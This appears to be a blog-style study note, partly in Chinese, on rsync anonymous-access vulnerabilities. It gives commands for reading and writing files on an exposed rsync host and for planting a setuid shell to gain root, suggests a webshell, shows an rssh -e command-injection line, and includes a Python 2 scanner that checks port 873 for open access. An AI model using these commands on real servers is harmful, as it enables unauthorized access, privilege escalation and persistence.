foreword

Two days ago, I summarized the common loopholes in the Internet or IT company's intranet, and then decided to study and understand the loopholes that I haven't learned yet, so I'm going to study them one by one. Today is the first one. It's done this year. Why is it so difficult? Because I am usually busy with work, I don't necessarily have time to study every week. Let me talk about common WEB vulnerabilities and weak password vulnerabilities, which are not included in this study.

Introduction to Rsync

What is Rsync

Rsync (remote synchronize) is a remote data synchronization tool that can quickly synchronize files between multiple hosts via LAN/WAN.

What is Rsync's anonymous access

Anonymous access is very simple, no user name is required, and all information for authentication (including various passwords, public and private keys, biological characteristics, etc.) is not required. In short, it can be accessed directly without any access control.

general hazards

下载：#rsync -avz a.b.c.d::path/file path/filiname  
上传：#rsync -avz path/filename a.b.c.d::path/file

Privilege escalation

#chmod a+s shell
#rsync -avz shell a.b.c.d::path/file
*查看shell权限不变，运行后提权到root，也可以尝试上传webshell*

rssh

Also rssh-2.3.3-3 does not properly filter the -e option, which can cause problems.

#rsync -e./script.sh  a.b.c.d::/tmp--server ./

Vulnerability verification

Metaspolit的auxiliary/scanner/rsync/modules_list
python script

# -*- coding:utf-8 -*-
"""
    Rsync匿名访问漏洞（未授权访问漏洞）验证工具
"""

#引入依赖的包和库文件
import os
import sys
import socket
import logging

#全局配置设置
logging.basicConfig(level=logging.INFO,format="%(message)s")
socket.setdefaulttimeout(3)


#全局变量
client = socket.socket(socket.AF_INET,socket.SOCK_STREAM)


#全局函数：
def str2Binary(content):
    """将文本流转换成二进制流"""
    return content.replace(' ','').replace('\n','').decode('hex')

def rsyncCheck(ip,port):
    """执行端口预检查"""
    global client
    try:
        client.connect((ip,port))
    except Exception,reason:
        logging.error("[-] 访问失败：%s"%reason)
        return False
    helloString = "405253594e43443a2033312e300a"
    try:
        client.send(str2Binary(helloString))
        hellodata = client.recv(1024)
    except Exception,reason:
        logging.error("[-] 通信失败：%s"%reason)
        return False
    if hellodata.find("@RSYNCD") >= 0:
        try:
            client.send(str2Binary("0a"))
        except Exception,reason:
            logging.error("[-] 访问失败：%s"%reason)
            return False
        while True:
            try:
                data = client.recv(1024)
            except Exception,reason:
                logging.error("[-] 通信失败：%s"%reason)
            if data == "":
                break
            else:
                if str(data).find("@RSYNCD: EXIT") >= 0:
                    logging.info("[*] 发现漏洞！")
                    return True
    return False


if __name__ == "__main__":
    ip = sys.argv[1]
    try:
        port = sys.argv[2]
    except Exception,reason:
        port = 873
        logging.error("[-] 端口未输入，按照873默认端口进行")
    try:
        port = int(port)
    except Exception,reason:
        logging.error("[-] 端口输入错误，按照873默认端口进行")
        port = 873
    if not rsyncCheck(ip,port):
        logging.info("[+] 测试安全！")

Rsync anonymous access vulnerability